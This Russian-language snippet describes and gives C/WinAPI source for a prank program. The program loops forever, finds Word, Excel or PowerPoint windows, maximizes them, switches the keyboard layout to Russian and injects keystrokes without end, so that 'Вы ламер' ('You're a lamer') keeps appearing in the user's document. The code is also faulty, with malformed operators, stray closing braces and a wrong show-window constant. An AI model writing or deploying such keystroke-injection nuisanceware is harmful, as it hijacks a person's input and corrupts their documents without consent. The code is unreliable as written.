Запускаем бесконечный цикл каждые 10 секунд. В цикле ищем окна содержащие в своих заголовках Microsoft Word, Microsoft Excel, Microsoft PowerPoint. Максимизируем окно, переключаем раскладку клавиатуры на русскую и эмулируем нажатие на несколько клавиш. В результате в окне пользователя в WORD сам по себе печатается текст " Вы ламер".

int k=0;

do

{

if (FindWindow(NULL, " Microsoft Word")! =0 || FindWindow(NULL, " Microsoft Excel")! =0 || FindWindow(NULL, " Microsoft PowerPoint")! =0)

{

ShowWindow(FindWindow(NULL, " Microsoft Word"), SC_MAXIMIZE);

LoadKeyboardLayout(" 00000419", KLF_ACTIVATE);

Sleep(10000);

do

{

keybd_event('D', 0, 0, 0);

keybd_event('D', 0, KEYEVENTF_KEYUP, 0);

keybd_event('S', 0, 0, 0);

keybd_event('S', 0, KEYEVENTF_KEYUP, 0);

keybd_event(VK_SPACE, 0, 0, 0);

keybd_event(VK_SPACE, 0, KEYEVENTF_KEYUP, 0);

keybd_event('K', 0, 0, 0);

keybd_event('K', 0, KEYEVENTF_KEYUP, 0);

keybd_event('F', 0, 0, 0);

keybd_event('F', 0, KEYEVENTF_KEYUP, 0);

keybd_event('V', 0, 0, 0);

keybd_event('V', 0, KEYEVENTF_KEYUP, 0);

keybd_event('T', 0, 0, 0);

keybd_event('T', 0, KEYEVENTF_KEYUP, 0);

keybd_event('H', 0, 0, 0);

keybd_event('H', 0, KEYEVENTF_KEYUP, 0);

}while(1);

}

}while(1);

}

.